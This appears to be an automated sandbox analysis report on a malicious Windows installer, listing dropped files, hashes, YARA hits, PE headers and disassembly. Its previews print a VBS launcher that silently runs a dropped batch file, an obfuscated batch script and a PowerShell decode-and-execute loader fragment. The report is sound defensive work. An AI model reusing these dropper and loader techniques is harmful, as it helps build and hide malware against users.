                                                                                                                                  MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                                                                                                  SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                                                                                                  SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                                                                                                  SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1384
                                                                                                                                  Entropy (8bit):5.395091763144815
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:3fWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9tXt/NK3R88bJ0ur89dOR:vWSU4xymI4RfoUeW+mZ9tlNWR83uWOR
                                                                                                                                  MD5:4CBB3158FDB7744A1B86CCBDAC07BC5A
                                                                                                                                  SHA1:193870F27B15DAEEA998B823DF78849FDEF83292
                                                                                                                                  SHA-256:F98D1EFDCE9DAAA88841947310D9D2BF9FB3B25ABDE508AC719983EC8B10F8F7
                                                                                                                                  SHA-512:4505AEE1C52F59D739133818247DBEA251AE625DCF2ED2BF4E375D8B9591550363B6A2566937E93F698A3B53BA0E90FF3AECB1343CA0BBE46595EB23FF465BF5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2662
                                                                                                                                  Entropy (8bit):7.8230547059446645
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                  MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                  SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                  SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                  SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                  Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2662
                                                                                                                                  Entropy (8bit):7.8230547059446645
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                  MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                  SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                  SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                  SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2251
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3::
                                                                                                                                  MD5:0158FE9CEAD91D1B027B795984737614
                                                                                                                                  SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                                                                                  SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                                                                                  SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (41860), with CRLF, LF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):326634
                                                                                                                                  Entropy (8bit):6.02046937695081
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:hSDgBmX4h5x6Q6cPCGUFn6uXzcKZuzVLyFBnPfWjD/DoEMs:bB5uQ6uiJXzcKZu9MlU/kTs
                                                                                                                                  MD5:36B4C4D03AB02764F2E47E30DBB6C71E
                                                                                                                                  SHA1:E334F09316C3C468EDC1B2002F18AA886324C1FA
                                                                                                                                  SHA-256:C94456D2617C5624A7FEB6C47D0C0AB0F44EFECB3F5B17F38E79AEB915F3D883
                                                                                                                                  SHA-512:BE8B27F19A223B422B0C9BC3EEB775DA5595570988B5D8FEE0856C398AB0BEFCD6C9E86D75483AFBE5F8B938278FCFC9F3EFAC2FD8A25FBF55E213A56C34860B
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:@echo off....setlocal enabledelayedexpansion..set "GOAhpDZonpszAkhZywubLdxcMcqBpeBMJgCgizklWyfKLGQFPR=%userprofile%\QJHJap.ps1"..set HPqLPCrxummxZjOGQuHbQYlifmXNrgmKMxwLvXqZPKfYYyzWVe=%SystemRoot%\SysWow64\WindowsPowerShell\v1.0\powershell.exe..set "LIUFIweVbVclDHhtMvPOrqpqYGTfmgOJRdHuySgMwbrxIstWPJ=%~dp0%~nx0"....set OWkTTXsqBUPpXZPDLTXkQMgYTXAqmaBcpNSRQZusxvxBYSqsXQOWkTTXsqBUPpXZPDLTXkQMgYTXAqmaBcpNSRQZusxvxBYSqsXQ=eYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqp..set QwYNbJDhGDEDgoaCKCMclSdHmgTnkGNbSnqPMYwNinrNulEQXwQwYNbJDhGDEDgoaCKCMclSdHmgTnkGNbSnqPMYwNinrNulEQXw=eYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqp-EeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpxeeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpcutieYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIV
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (488), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2781
                                                                                                                                  Entropy (8bit):5.173238868713899
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:IJH3AmLXIbs7km/vHhVfB1IPXAQkIKKx7eKcMiXLrszmF6NSNt9E3Hw3f36JT:I5NXtD/LUgzfoNSNjE3+fe
                                                                                                                                  MD5:F8251AA191BB5087D04AA8F873B4B676
                                                                                                                                  SHA1:1DDCF57936BB1D4594C35527857C79D594B8773C
                                                                                                                                  SHA-256:1323E4394630AB1A9A0DC33A74F2B5C53115A4FE2CB94B24C7DEEF2FE6B691C6
                                                                                                                                  SHA-512:0DBE1D657E508B948A58403C0CF943F8BE41B4A8950F6596626DCC795D71BB3839D1C248DC26DF5168AEF8A157BAF4E9D71E45A1FE59C7253AC3C19D78A09D58
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\QJHJap.ps1, Author: Joe Security
                                                                                                                                  Preview:.function DecompressBytes($compressedData) { $ms = [IO.MemoryStream]::new(([System.Convert]::FromBase64String($compressedData))); $ms.Position = 0; $deflateStream = [IO.Compression.DeflateStream]::new($ms, [IO.Compression.CompressionMode]::Decompress); $buffer = [byte[]]::new(4096); $ms = [IO.MemoryStream]::new(); while ($true) { $count = $deflateStream.Read($buffer, 0, $buffer.Length); if ($count -eq 0) { break } $ms.Write($buffer, 0, $count) } $deflateStream.Close(); $ms.ToArray() }....# "The surest way to corrupt a youth is to instruct him to hold in higher esteem those who think alike than those who think differently."..# "In heaven, all the interesting people are missing."..# "He who has a why to live can bear almost any how."..# "To live is to suffer, to survive is to find some meaning in the suffering."..# "Without music, life would be a mistake."......function ReverseString($inputString) {.. $charArray = $inputString.ToCharArray().. $reversedArray = $charArray[-1..-($ch
                                                                                                                                  Process:C:\Users\user\Desktop\f6FauZ2CEz.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):170
                                                                                                                                  Entropy (8bit):4.938405647464763
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:jfAEm8nhZFQ1qLZ8ewMxHFXhOwpvlD95RthYSYDAYgPJzphUC:jfANqhZ2wCf8HjOwpND95Jj0AYYdUC
                                                                                                                                  MD5:65EE9F906FDEFCA9B4A6A21581DD849F
                                                                                                                                  SHA1:B372DEA5A9B9A99311445A55B634AA8F6C1D7B9D
                                                                                                                                  SHA-256:087F43E7F9F78BBEB1050CDBFAEB3D23AD7B4B742D6EF91229B8824A20DAAEE6
                                                                                                                                  SHA-512:1F593864F52AC61F7F4EF2AA1BFCF538DD2833E53BBD931F96C42B2CA90D2BF68545FDAC547F0F3CCE09AD7734ACDB629BF642081227A996D3D22117263AD23A
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:Set house = CreateObject("WScript.Shell")..play =house.ExpandEnvironmentStrings("%userprofile%")..ball = play & "\temp.bat"..house.Run ball, 0, False..Set house = Nothing
                                                                                                                                  Process:C:\Users\user\Desktop\f6FauZ2CEz.exe
                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (41860), with CRLF, LF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):326634
                                                                                                                                  Entropy (8bit):6.02046937695081
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:hSDgBmX4h5x6Q6cPCGUFn6uXzcKZuzVLyFBnPfWjD/DoEMs:bB5uQ6uiJXzcKZu9MlU/kTs
                                                                                                                                  MD5:36B4C4D03AB02764F2E47E30DBB6C71E
                                                                                                                                  SHA1:E334F09316C3C468EDC1B2002F18AA886324C1FA
                                                                                                                                  SHA-256:C94456D2617C5624A7FEB6C47D0C0AB0F44EFECB3F5B17F38E79AEB915F3D883
                                                                                                                                  SHA-512:BE8B27F19A223B422B0C9BC3EEB775DA5595570988B5D8FEE0856C398AB0BEFCD6C9E86D75483AFBE5F8B938278FCFC9F3EFAC2FD8A25FBF55E213A56C34860B
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:@echo off....setlocal enabledelayedexpansion..set "GOAhpDZonpszAkhZywubLdxcMcqBpeBMJgCgizklWyfKLGQFPR=%userprofile%\QJHJap.ps1"..set HPqLPCrxummxZjOGQuHbQYlifmXNrgmKMxwLvXqZPKfYYyzWVe=%SystemRoot%\SysWow64\WindowsPowerShell\v1.0\powershell.exe..set "LIUFIweVbVclDHhtMvPOrqpqYGTfmgOJRdHuySgMwbrxIstWPJ=%~dp0%~nx0"....set OWkTTXsqBUPpXZPDLTXkQMgYTXAqmaBcpNSRQZusxvxBYSqsXQOWkTTXsqBUPpXZPDLTXkQMgYTXAqmaBcpNSRQZusxvxBYSqsXQ=eYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqp..set QwYNbJDhGDEDgoaCKCMclSdHmgTnkGNbSnqPMYwNinrNulEQXwQwYNbJDhGDEDgoaCKCMclSdHmgTnkGNbSnqPMYwNinrNulEQXw=eYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqp-EeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpxeeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpcutieYmvoutDGcCZIVgsuzZMVTpdsqZSIFnXqDcQwvPmbUmejxsvqpeYmvoutDGcCZIV
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):27
                                                                                                                                  Entropy (8bit):3.37639561516815
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:N/XANAKxcvn:B7KE
                                                                                                                                  MD5:D9C586991FACF81AE3350D1F2468D551
                                                                                                                                  SHA1:4021D00AB6D09D9DEF8964CF7D5B137E2057803D
                                                                                                                                  SHA-256:A04C3131D5D2D6A794281B2525967934811D733BE6DFCE8658AC90F520F8A14F
                                                                                                                                  SHA-512:8D37243809F6AF2D51F844497FBEB4268366D3121A8C76EFE74917C77B5044732ACDEB4638CE47B649AB3A00A8584855015D4DE374B184DB83C0809FA721D421
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: 1 file(s) copied...
                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Entropy (8bit):6.8956508991492775
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:f6FauZ2CEz.exe
                                                                                                                                  File size:372'912 bytes
                                                                                                                                  MD5:1544dbca0efc2c0105dd7d52a21a8891
                                                                                                                                  SHA1:7fbacdb27457829215cd182eab0a4e4bb4379648
                                                                                                                                  SHA256:d5038b0adfdfc36c23dbaafd982bb50bb0e9fc10838e731e10d182d91b28d970
                                                                                                                                  SHA512:2b5cd7536e41c53d6538302c7c8b471e3a5b94926d50833c09c7e737659b8bba4c33ff02521502c90c65c11fea406a05323ff05f4fc529e54d7517653bc9e471
                                                                                                                                  SSDEEP:6144:1fL+oqZLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLPLLLLLLLW:1fLwLLLLLLLLLLLLLLLLLLLLLLLLLLLu
                                                                                                                                  TLSH:7084E1803F62CE15D9650A700B3585EB4F20BC571F6065BA2751FB8DB4F39A3EE0E9A1
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........
                                                                                                                                  Icon Hash:18d0b28283828080
                                                                                                                                  Entrypoint:0x403532
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                                                                  Instruction
                                                                                                                                  sub esp, 000003F8h
                                                                                                                                  push ebp
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  push 00000020h
                                                                                                                                  pop edi
                                                                                                                                  xor ebp, ebp
                                                                                                                                  push 00008001h
                                                                                                                                  mov dword ptr [esp+20h], ebp
                                                                                                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                  mov esi, dword ptr [004080A8h]
                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                  push eax
                                                                                                                                  mov dword ptr [esp+4Ch], ebp
                                                                                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                  mov dword ptr [esp+00000150h], ebp
                                                                                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                  call esi
                                                                                                                                  test eax, eax
                                                                                                                                  jne 00007F7859215BFAh
                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                  mov dword ptr [esp+34h], 00000114h
                                                                                                                                  push eax
                                                                                                                                  call esi
                                                                                                                                  mov ax, word ptr [esp+48h]
                                                                                                                                  mov ecx, dword ptr [esp+62h]
                                                                                                                                  sub ax, 00000053h
                                                                                                                                  add ecx, FFFFFFD0h
                                                                                                                                  neg ax
                                                                                                                                  sbb eax, eax
                                                                                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                  not eax
                                                                                                                                  and eax, ecx
                                                                                                                                  mov word ptr [esp+00000148h], ax
                                                                                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                                                                                  jnc 00007F7859215BC8h
                                                                                                                                  and word ptr [esp+42h], 0000h
                                                                                                                                  mov eax, dword ptr [esp+40h]
                                                                                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                  mov dword ptr [004347B8h], eax
                                                                                                                                  xor eax, eax
                                                                                                                                  mov ah, byte ptr [esp+38h]
                                                                                                                                  movzx eax, ax
                                                                                                                                  or eax, ecx
                                                                                                                                  xor ecx, ecx
                                                                                                                                  mov ch, byte ptr [esp+00000148h]
                                                                                                                                  movzx ecx, cx
                                                                                                                                  shl eax, 10h
                                                                                                                                  or eax, ecx
                                                                                                                                  movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                                  Programming Language:
                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x45000 | 0x19998 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x68d8 | 0x6a00 | 742185983fa6320c910f81782213e56f | False | 0.6695165094339622 | data | 6.478461709868021 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1464 | 0x1600 | a995b118b38426885fc6ccaa984c8b7a | False | 0.4314630681818182 | data | 4.969091535632612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
